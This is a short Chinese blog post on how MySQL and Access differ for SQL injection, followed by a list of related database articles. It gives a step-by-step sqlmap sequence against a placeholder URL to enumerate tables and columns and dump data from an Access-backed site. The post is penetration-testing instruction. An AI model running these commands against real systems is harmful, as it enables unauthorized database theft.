数据库管理系统对SQL注入的影响
2015-10-10 23:35
435 查看
Why
首先说明为什么不同呢?不同数据库管理系统基本的SQL语句相同,但是支持的某些函数,数据库的整体结构和组织方式是不相同的。比如mysql数据库中特有的information_schema数据库,里面存有所有的数据库名称,以及各个数据库中表的名称等等信息。对SQL注入的影响
数据库管理系统的不同导致SQL注入时,进行利用的方式和难度不相同,Mysql数据库中直接通过version()等函数以及infomation_schema数据库得到数据库版本,用户名以及所有数据库的信息。但access就不能通过这些方式。SqlMAP对不同数据库的处理
SqlMap在对access数据库进行处理时,不能使用-dbs等选项,进行数据表的枚举时,采用的是暴力破解的方式,字典位于txt/common-tables.txt中。
SqlMAP对Access数据库架构网站注入的步骤如下:sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3
sqlmap.py -u "http://ip/" --data="postdata" --level=5
--risk=3 --tables //枚举表
sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3 --columns -T "tablename" // 枚举列名
sqlmap.py -u "http://ip/" --data="postdata" --level=5 --risk=3 --dump -C "name1, name2" -T "tablename" //获取name1, name 2列的数据
SqlMAP对mysql数据的注入步骤见《metasploit渗透测试魔鬼训练营》 之 SQL注入
相关文章推荐
- 对比 Redis 与 Memcached
- Oracle EBS MRP 模块测试记录
- 数据库设计经验之谈
- MongoDB——权限管理
- 数据库原理之一(ER图)
- MYSQL安装ERROR 0
- MySQL group_concat 1024 大小
- mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性
- SQL Server 2005 更改安装路径目录的问题,
- 【SQL】NULLS FIRST的作用
- SQL Server 2005的安装
- MySQL学习笔记
- mysql 函数 + 存储过程
- 问题解决 sql server 2008 评估期已过期解决办法
- 问题解决 sql server 2008 评估期已过期解决办法
- 第七课 MongoDB 特殊索引
- 第六课 MongoDB 索引
- mysql服务常用命令
- Lock wait timeout exceeded; try restarting transaction--MySQL
- 【MySql】常见问题集锦